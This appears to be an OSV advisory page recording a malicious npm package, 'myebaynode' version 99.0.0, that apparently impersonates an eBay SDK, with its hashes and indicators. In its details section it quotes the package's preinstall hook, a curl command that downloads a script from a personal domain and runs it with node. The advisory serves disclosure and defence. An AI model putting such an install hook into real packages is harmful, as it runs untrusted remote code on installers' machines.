MAL-2026-6296

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/myebaynode/MAL-2026-6296.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-6296

Published

2026-06-23T14:09:56Z

Modified

2026-06-23T14:31:20.329405282Z

Summary

Malicious code in myebaynode (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (12d56c05672731322d45fb9273fb782a6b8042260fb019b2d96c755eed084fc3)

package.json declares a preinstall lifecycle hook that runs curl https://poc.amanrawat.com/hehe.js -o index.js && node index.js, fetching JavaScript from an external, mutable, personal domain and immediately executing it under the installer's user account on npm install. The fetched payload is unpinned (no hash or signature verification), can be changed by the host's owner at any time, and runs with full filesystem and network access of the installing user. The package name 'myebaynode' with description 'Ebay Node Package', version 99.0.0, and minimal metadata (author 'aman', no repository) suggests brand-impersonation intended to lure developers searching for an eBay SDK.

Database specific

{
    "malicious-packages-origins": [
        {
            "sha256": "12d56c05672731322d45fb9273fb782a6b8042260fb019b2d96c755eed084fc3",
            "id": "IN-MAL-2026-007197",
            "source": "amazon-inspector",
            "modified_time": "2026-06-23T14:09:56Z",
            "versions": [
                "99.0.0"
            ],
            "import_time": "2026-06-23T14:23:02.347959934Z"
        }
    ]
}

References

https://www.npmjs.com/package/myebaynode/v/99.0.0

Credits

- Amazon Inspector - FINDER
- - inspector-research@amazon.com

Affected packages

npm / myebaynode

Package

Name: myebaynode; View open source insights on deps.dev
Purl: pkg:npm/myebaynode

Affected ranges

Affected versions

99.*

99.0.0

Database specific

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/myebaynode/MAL-2026-6296.json"

cwes

[
    {
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature.",
        "cweId": "CWE-506"
    }
]

indicators

{
    "evidence_files": [
        {
            "sha256": "9f676970e07f2718ac80aa9f44598be95d67f13c8b6c06499c930a8074bbd8d0",
            "tlsh": "a0e07d745d20117335c402e1cc2a9c4ed1925e3f0004380957db042c418eb7758ff31c",
            "path": "package.json"
        }
    ],
    "package_integrity": [
        {
            "filename": "myebaynode-99.0.0.tgz",
            "hashes": {
                "sha1": "4c42f5e72fc606a33b23a9b9857d58193cf1ca74",
                "sha512_sri": "sha512-r6POebR9Wes8FrM3bKz1a4x6l9hw6Iim/ve6olH19077JPm+r1A12dD9PrYfG6Id7ociquzcPUJU1VIp2FICYw=="
            }
        }
    ]
}